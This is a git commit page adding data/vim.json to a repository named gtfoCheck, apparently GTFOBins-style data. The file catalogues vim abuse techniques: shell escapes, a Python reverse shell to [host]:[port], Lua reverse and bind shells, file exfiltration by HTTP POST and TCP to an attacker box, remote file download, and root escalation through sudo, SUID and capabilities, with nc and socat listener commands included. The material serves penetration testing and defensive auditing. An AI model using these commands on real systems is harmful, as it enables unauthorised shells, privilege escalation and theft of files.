Graham
/
gtfoCheck
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

add data for vim

Browse Source
master
t0thkr1s 4 years ago
parent d7573b0605
commit defeca370c
1 changed files with 109 additions and 0 deletions
Show Stats Download Patch File Download Diff File

109
data/vim.json
Unescape Escape View File

@ -0,0 +1,109 @@
{
"functions": {
"shell": [
{
"code": "vim -c ':!/bin/sh'"
},
{
"code": "vim\n:set shell=/bin/sh\n:shell\n"
},
{
"description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3.",
"code": "vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
},
{
"description": "This requires that 'vim' is compiled with Lua support.",
"code": "vim -c ':lua os.execute(\"reset; exec sh\")'"
}
],
"reverse-shell": [
{
"description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3. Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
"code": "vim -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
}
],
"non-interactive-reverse-shell": [
{
"description": "Run 'nc -lp [port]' on the attacker box to receive the shell. This requires that 'vim' is compiled with Lua support and that 'lua-socket' is installed.",
"code": "vim -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\n t:connect(\"[host]\",[port]);\n while true do\n local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));t:send(b);\n end;\n f:close();t:close();'\n"
}
],
"non-interactive-bind-shell": [
{
"description": "Run 'nc [host] [port]' on the attacker box to connect to the shell. This requires that 'vim' is compiled with Lua support and that 'lua-socket' is installed.",
"code": "vim -c ':lua local k=require(\"socket\");\n local s=assert(k.bind(\"*\",[port]));\n local c=s:accept();\n while true do\n local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));c:send(b);\n end;c:close();f:close();'\n"
}
],
"file-upload": [
{
"description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3. Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
"code": "vim -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))\nvim.command(\":q!\")'\n"
},
{
"description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3. Serve files in the local folder running an HTTP server.",
"code": "vim -c ':py import vim,sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
},
{
"description": "Send a local file via TCP. Run 'nc -lp [port] > [file]' on the attacker box to collect the file. This requires that 'vim' is compiled with Lua support and that 'lua-socket' is installed.",
"code": "vim -c ':lua local f=io.open(\"[file]\", 'rb')\n local d=f:read(\"*a\")\n io.close(f);\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"[host]\",[port]);\n t:send(d);\n t:close();'\n"
}
],
"file-download": [
{
"description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3. Fetch a remote file via HTTP GET request.",
"code": "vim -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")\nvim.command(\":q!\")'\n"
},
{
"description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file. This requires that 'vim' is compiled with Lua support and that 'lua-socket' is installed.",
"code": "vim -c ':lua local k=require(\"socket\");\n local s=assert(k.bind(\"*\",[port]));\n local c=s:accept();\n local d,x=c:receive(\"*a\");\n c:close();\n local f=io.open(\"[file]\", \"wb\");\n f:write(d);\n io.close(f);'\n"
}
],
"file-write": [
{
"code": "vim [file]\niDATA\n^[\nw\n"
}
],
"file-read": [
{
"code": "vim [file]"
}
],
"library-load": [
{
"description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3.",
"code": "vim -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'"
}
],
"suid": [
{
"description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3.",
"code": "./vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
}
],
"sudo": [
{
"code": "sudo vim -c ':!/bin/sh'"
},
{
"description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3.",
"code": "sudo vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
},
{
"description": "This requires that 'vim' is compiled with Lua support.",
"code": "sudo vim -c ':lua os.execute(\"reset; exec sh\")'"
}
],
"capabilities": [
{
"description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3.",
"code": "./vim -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
}
],
"limited-suid": [
{
"description": "This requires that 'vim' is compiled with Lua support.",
"code": "./vim -c ':lua os.execute(\"reset; exec sh\")'"
}
]
}
}
Write Preview
Loading…
Cancel
Save